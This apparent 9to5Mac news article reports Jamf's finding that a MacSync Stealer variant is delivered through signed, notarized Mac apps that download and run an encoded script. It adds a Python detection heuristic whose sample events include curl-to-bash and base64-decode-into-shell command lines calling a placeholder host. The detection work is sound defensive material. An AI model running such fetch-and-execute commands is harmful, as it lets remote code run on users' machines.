We recently saw how ChatGPT is being used to trick Mac users into installing MacStealer, and now we’ve discovered another tactic to convince users to install a version of MacSync Stealer.
Thanks to Apple’s protections against installing malware, Macs remain a relatively difficult target for attackers. But Mac malware is on the rise, and two tactics recently discovered by security researchers highlight the ingenious approaches some attackers are using.
There were once two main reasons why Mac malware was relatively rare compared to Windows. The first, of course, was the Mac's relatively low market share. The second is the set of protections Apple has built in to detect and block rogue apps.
As the Mac’s market share grows, so too does the platform’s attractiveness as a target, especially given that Apple’s demographics make Mac users a particularly attractive target for financial fraud.
When you try to install a new Mac app, macOS checks that the app is signed by a known developer and notarized by Apple. If it isn't, macOS flags this and makes bypassing the protection to install the app a relatively involved process.
Earlier this month, we discovered that attackers were using ChatGPT and other AI chatbots to trick Mac users into pasting command lines into Terminal and installing malware. Cybersecurity company Jamf has discovered an example of a different approach being taken.
MacSync Stealer installer
Jamf says the malware is a variant of the “increasingly active” MacSync Stealer malware.
Attackers use Swift apps that are signed and notarized and do not themselves contain malware. At runtime, however, the app retrieves an encoded script from a remote server; that script is then executed and installs the malware.
We inspected the Mach-O binaries that are universal builds and found that they are both code signed and notarized. The signature is associated with developer team ID GNJLS3UYZ4.
We also verified the code directory hashes against Apple’s revocation list, and none were revoked at the time of our analysis (…)
Most payloads associated with MacSync Stealer tend to execute primarily in memory, leaving little or no trace on disk.
The company says that attackers are increasingly using this type of approach.
This change in distribution reflects a broader trend across the macOS malware landscape, with attackers increasingly attempting to sneak malware into signed and notarized executable files that appear as legitimate applications. By leveraging these techniques, attackers reduce their chances of early detection.
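Because the wrapper app is legitimately signed and the payload runs mostly in memory, file scanning has little to catch; the useful signal is the process chain itself: a notarized parent spawning a shell that fetches, decodes and pipes a script into an interpreter. The Python below is an added example, not code from Jamf or 9to5Mac; the event records, the parent app path and the example.invalid host are all constructed.

```python
import re

# Constructed sample process-exec events (not real telemetry). Each record carries
# the parent's executable path, whether Gatekeeper accepted it as notarized, and
# the child's full command line as an EDR would log it.
SAMPLE_EVENTS = [
    {"parent": "/Applications/Example Utility.app/Contents/MacOS/Example Utility",
     "parent_notarized": True,
     "cmd": "/bin/sh -c 'curl -fsSL https://example.invalid/p.txt | base64 -d | /bin/bash'"},
    {"parent": "/Applications/Example Utility.app/Contents/MacOS/Example Utility",
     "parent_notarized": True,
     "cmd": "/usr/bin/osascript -e 'display dialog \"Done\"'"},
    {"parent": "/usr/local/bin/dev-tool", "parent_notarized": False,
     "cmd": "/bin/bash -c 'curl -fsSL https://example.invalid/install.sh | bash'"},
    {"parent": "/Applications/Example Utility.app/Contents/MacOS/Example Utility",
     "parent_notarized": True,
     "cmd": '/bin/zsh -c "echo aGVsbG8= | base64 --decode | zsh"'},
]

FETCHERS = {"curl", "wget", "nscurl"}          # stage that pulls the script from a server
DECODERS = {"base64", "openssl", "xxd"}        # stage that unwraps an encoded script
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python3", "perl"}
SHELL_WRAPPER = re.compile(r"^\S+\s+-c\s+(['\"])(.*)\1\s*$", re.S)

def pipeline_stages(cmd):
    """Return the program name of each '|'-separated stage, unwrapping '<shell> -c "..."'."""
    m = SHELL_WRAPPER.match(cmd)
    inner = m.group(2) if m else cmd
    return [seg.split()[0].rsplit("/", 1)[-1] for seg in inner.split("|") if seg.strip()]

def classify(event):
    """Score one child process; returns None when nothing in the chain looks staged."""
    stages = pipeline_stages(event["cmd"])
    fetched = any(s in FETCHERS for s in stages)
    decoded = any(s in DECODERS for s in stages)
    executed = bool(stages) and stages[-1] in INTERPRETERS
    if not executed or not (fetched or decoded):
        return None
    if fetched and event["parent_notarized"]:
        verdict = "high"     # notarized parent piping a remote script straight into an interpreter
    elif fetched:
        verdict = "medium"   # remote script into an interpreter, but no trusted-wrapper angle
    else:
        verdict = "low"      # local encoded blob decoded into an interpreter
    return {"parent": event["parent"], "stages": stages, "fetched": fetched,
            "decoded": decoded, "verdict": verdict}

def triage(events):
    """Run classify() over a batch and keep only the hits, highest severity first."""
    order = {"high": 0, "medium": 1, "low": 2}
    hits = [f for f in map(classify, events) if f]
    return sorted(hits, key=lambda f: order[f["verdict"]])

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["verdict"], finding["stages"], finding["parent"])
```

The heuristic only splits on `|`; chains joined with `;` or `&&`, or scripts written to a temp file first, need a further pass.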
Jamf says it has reported the developer ID to Apple and the company is currently revoking the certificate.
9to5Mac’s opinion
As always, the best protection against Mac malware is to install apps only from the Mac App Store and trusted developer websites.
Photo by Ramshid on Unsplash